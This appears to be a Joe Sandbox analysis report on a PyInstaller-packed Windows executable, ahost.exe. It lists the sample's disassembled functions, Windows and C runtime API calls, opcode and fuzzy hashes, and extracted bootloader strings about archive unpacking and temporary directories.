Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: b995d14cf994745d34865209235cb9d1d4201b7ba99cab2ff239f339a7baf403
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: 50D1E172F18A848AE710DF65E8401AC7771FB54798B848235DF6E97BD9EE38E006C790

Function 00007FF7F91FF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7F91FFAEC
_get_daylight.LIBCMT ref: 00007FF7F91FFAFD
_get_daylight.LIBCMT ref: 00007FF7F91FFB0E
_isindst.LIBCMT ref: 00007FF7F91FFBD9

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: edcbd4e15d9d6da7310bf1c3debd539de2ac0b37613043e10e6cf010f95aaac0
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: DE51F772F081168AFB14EF25AD556BCABB1AB4035CF900135DE3D93BE9EB78A441C750

Function 00007FF7F91F57EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF7F91F581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF7F91F5881
GetLastError.KERNEL32 ref: 00007FF7F91F5912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F91F5724), ref: 00007FF7F91F595E

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: bc71f6a46c97314d402491e90189e43e978977f666798dff1eb46f7ef807e040
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 8B518B22E086458AFB14EFB1A8503BDA3B1BB48B58F944435DF2D976C9EF39D441C7A0

Function 00007FF7F91E20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7F91E20F4
SetWindowLongPtrW.USER32 ref: 00007FF7F91E2116
GetWindowLongPtrW.USER32 ref: 00007FF7F91E2140
InvalidateRect.USER32 ref: 00007FF7F91E2160

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: da57125d96bc366e0d0476a6ff76c63da60f2251fdf91eb403472fd68eaead5b
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 06117321E1814243FB64BF69B95427D9271EB84780FC84430DA6A47BDDCD2DE6958251

Function 00007FF7F9205B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F92017D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F9201803

_get_daylight.LIBCMT ref: 00007FF7F9205CA4
_get_daylight.LIBCMT ref: 00007FF7F9205CB5

Strings

?, xrefs: 00007FF7F9205C35

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction ID: 400a9f948239cff76c9ed9ceeca87c3b98fe818b1014b88f3b30f1bf36b8fbec
Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction Fuzzy Hash: 33412B12A0868541FBA4AF16AC0177AD670EF80BA4F944235EF7C86AEDDF3DD441C750

Function 00007FF7F91F9084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F90B6

Part of subcall function 00007FF7F91FA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9CE
Part of subcall function 00007FF7F91FA9B8: GetLastError.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7F91ECC15), ref: 00007FF7F91F90D4

Strings

C:\Users\user\Desktop\ahost.exe, xrefs: 00007FF7F91F90C2

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\ahost.exe
API String ID: 3580290477-1499232478
Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction ID: adc4a53bb395f10b9034431e5b2439fc78f3c81fb0db11b6ff468e0c5712f581
Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction Fuzzy Hash: C4415F32E08A4685FB54BF25AC400B8A6B4EB447D8BD54035EB6E477CDEE3DE44183A0

Function 00007FF7F91FCCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7F91FCDBF
GetLastError.KERNEL32 ref: 00007FF7F91FCDE1

Strings

U, xrefs: 00007FF7F91FCD6B

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 908476807976353adf4b453babdfbc084a1d334f8dbb5a8bdd553b699048266d
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 9441B432B19A4581EB60AF25F8443ADA771FB88794F804031EE6D87B98EF3CD401CB90

Function 00007FF7F91FF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7F91FF668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7F91FF6BA

Strings

:, xrefs: 00007FF7F91FF67E

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
Instruction ID: 5bb81c8b85d3395f77290db51f4e3511d13725c8bf99afbafa521d9bab351c51
Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
Instruction Fuzzy Hash: 2221B422E0868582FB20AF16E84426DA3B1FB84B48FD54035D7BD437D8EFBCE545C6A1

Function 00007FF7F91EFDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7F91EFE08
RaiseException.KERNEL32 ref: 00007FF7F91EFE49

Strings

csm, xrefs: 00007FF7F91EFE36

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: cb0449f0d956bc6644817e4d5775ea5f04d8714c14a6814dce1047c97642e9ed
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 21115E32A08B8182EB619F16F800259B7F0FB88B84F984230EE9D077A9DF3CD551CB40

Function 00007FF7F92007AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F92007DC
GetDriveTypeW.KERNEL32 ref: 00007FF7F920081C

Strings

:, xrefs: 00007FF7F9200805

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 775c1a43d4b6b45612d4dd559e58d03c75d4705088c83f1bbd32eaf017fac919
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: F401252291824686F760BF50AC6527EA2B0EF88748FC40135D66D866EDEF2CE554CEA4

Analysis Process: ahost.exePID: 7328, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1559
Total number of Limit Nodes:	25

Executed Functions

Function 00007FF7F91E1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF7F91E3A0B, 00007FF7F91E3CD4, 00007FF7F91E3F6B
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF7F91E3B32
bye-runtime-tmpdir, xrefs: 00007FF7F91E3B68
Failed to load splash screen resources!, xrefs: 00007FF7F91E3E85
MEI, xrefs: 00007FF7F91E3933
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF7F91E3A17, 00007FF7F91E3A2F, 00007FF7F91E3A9B
Could not create temporary directory!, xrefs: 00007FF7F91E3CBF
pyi-contents-directory, xrefs: 00007FF7F91E3B8D
pyi-python-flag, xrefs: 00007FF7F91E3AD6
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF7F91E3EA6
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF7F91E3EBB
pyi-disable-windowed-traceback, xrefs: 00007FF7F91E3BB2
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF7F91E3882, 00007FF7F91E38AF
pkg, xrefs: 00007FF7F91E39BE
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF7F91E3C61
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF7F91E3D35
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF7F91E3E0A
_PYI_ARCHIVE_FILE, xrefs: 00007FF7F91E38D2, 00007FF7F91E39FF
_PYI_SPLASH_IPC, xrefs: 00007FF7F91E3A23, 00007FF7F91E3EF5
Failed to remove temporary directory: %s, xrefs: 00007FF7F91E3FC3
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF7F91E3971
Py_GIL_DISABLED, xrefs: 00007FF7F91E3AF4
Failed to convert DLL search path!, xrefs: 00007FF7F91E3DDC
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF7F91E3D12
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF7F91E3BE8
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7F91E39DE
Failed to start splash screen!, xrefs: 00007FF7F91E3ED4
VCRUNTIME140.dll, xrefs: 00007FF7F91E3DB1

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: d02545141998fec8b25848ae1ed1df906e7abc4b971c3e4ab34b798fb2006b6e
Instruction ID: 12aa85ab2cdde0f70342b0a0d965ed073491b76ac979dd2920709a4b0a1ace95
Opcode Fuzzy Hash: d02545141998fec8b25848ae1ed1df906e7abc4b971c3e4ab34b798fb2006b6e
Instruction Fuzzy Hash: 12328221E0868252FB69FF25AC542B9E671AF44780FC44032DA7D432DAEF2CF555C3A2

Function 00007FF7F92069D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F9206708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F9206749
Part of subcall function 00007FF7F9206708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F92067C7
Part of subcall function 00007FF7F9206708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F9206818

CreateFileW.KERNEL32 ref: 00007FF7F9206ADA
CreateFileW.KERNEL32 ref: 00007FF7F9206B2A
GetLastError.KERNEL32 ref: 00007FF7F9206B5A
GetFileType.KERNEL32 ref: 00007FF7F9206B6F
GetLastError.KERNEL32 ref: 00007FF7F9206B79
CloseHandle.KERNEL32 ref: 00007FF7F9206BAC
CloseHandle.KERNEL32 ref: 00007FF7F9206D0F
CreateFileW.KERNEL32 ref: 00007FF7F9206D44
GetLastError.KERNEL32 ref: 00007FF7F9206D53

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: ff76232cbed7a30bc7e6238ef5c919e726191a7b62a03495e9491e3e2f0634fa
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: CAC1AC32B28A4585FB50EF69D8902AC7771FB49B98B814335DA2E977E8DF38D051C390

Function 00007FF7F91E92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF7F91E9323
FindClose.KERNEL32 ref: 00007FF7F91E9332

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 25ffcb3d7ceb1a0c63f1bc185bbc53a57f859ebb0c3f1d7374ee1fd0df8b4536
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 91F04422A1974187FBA0AF60BC4976AE360AB84764F840335DA7D426D8DF3CE0598A50

Function 00007FF7F91E1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F91E7F80: _fread_nolock.LIBCMT ref: 00007FF7F91E802A

_fread_nolock.LIBCMT ref: 00007FF7F91E1A1B

Part of subcall function 00007FF7F91E2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F91E1B6A), ref: 00007FF7F91E295E

Strings

MEI, xrefs: 00007FF7F91E1991
calloc, xrefs: 00007FF7F91E1A68
Could not allocate buffer for TOC!, xrefs: 00007FF7F91E1B1B
Error on file., xrefs: 00007FF7F91E1B8D
Could not read full TOC!, xrefs: 00007FF7F91E1B55
fseek, xrefs: 00007FF7F91E19F5
fread, xrefs: 00007FF7F91E1A32, 00007FF7F91E1B5C
Failed to read cookie!, xrefs: 00007FF7F91E1A2B
Could not allocate memory for archive structure!, xrefs: 00007FF7F91E1A61
Failed to seek to cookie position!, xrefs: 00007FF7F91E19EE
malloc, xrefs: 00007FF7F91E1B22

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
Instruction ID: 595fa4c15704cc15ec1892222d3e6403c823762d84e9e687e1e3167b456afd6c
Opcode Fuzzy Hash: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
Instruction Fuzzy Hash: 6D816071E0868686FB60FF14E8502B9A3B0AF48744F844435DAAE877DDDE3CF54587A1

Function 00007FF7F91E1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7F91E14DE
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7F91E1518
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7F91E149F
fseek, xrefs: 00007FF7F91E14E5
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7F91E15DF
fread, xrefs: 00007FF7F91E15E6
malloc, xrefs: 00007FF7F91E151F

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
